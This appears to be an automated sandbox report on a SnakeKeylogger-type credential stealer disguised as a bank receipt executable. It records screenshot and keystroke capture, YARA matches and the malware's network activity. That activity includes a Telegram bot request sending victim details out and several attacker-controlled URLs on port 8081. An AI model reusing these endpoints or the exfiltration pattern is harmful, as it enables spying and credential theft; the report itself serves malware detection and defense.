Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2006/02/2025%20/%2017:09:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 10:15:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Feb 2025 10:15:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: e-dekont_html.exe, 00000000.00000002.1366238188.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1402705839.00000000029C9000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: e-dekont_html.exe, HvgRSvNGGXnNtV.exe.0.dr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en0
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003284000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: e-dekont_html.exe, 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.0000000003284000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.000000000331A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3789902160.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.00000000029FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.00000000039A3000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004251000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 0000000A.00000002.3797068948.0000000004547000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/0
Source: e-dekont_html.exe, 0000000A.00000002.3789902160.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, HvgRSvNGGXnNtV.exe, 00000010.00000002.3790644713.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49861 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.e-dekont_html.exe.439af38.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.e-dekont_html.exe.4357f18.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.e-dekont_html.exe.4357f18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: e-dekont_html.exe PID: 7624, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\e-dekont_html.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_00A6EFE4	0_2_00A6EFE4
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_02756F58	0_2_02756F58
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_02750078	0_2_02750078
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_02750088	0_2_02750088
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_02756F48	0_2_02756F48
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0864E448	0_2_0864E448
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08645AF8	0_2_08645AF8
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08647B68	0_2_08647B68
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08647B57	0_2_08647B57
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08645F20	0_2_08645F20
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08645F30	0_2_08645F30
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08648508	0_2_08648508
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08648518	0_2_08648518
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08647721	0_2_08647721
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08647730	0_2_08647730
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08667800	0_2_08667800
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086668F0	0_2_086668F0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866D1F0	0_2_0866D1F0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086656D0	0_2_086656D0
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08668849	0_2_08668849
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_08668858	0_2_08668858
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866F038	0_2_0866F038
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_086668E3	0_2_086668E3
Source: C:\Users\user\Desktop\e-dekont_html.exe	Code function: 0_2_0866A089	0_2_0866A089
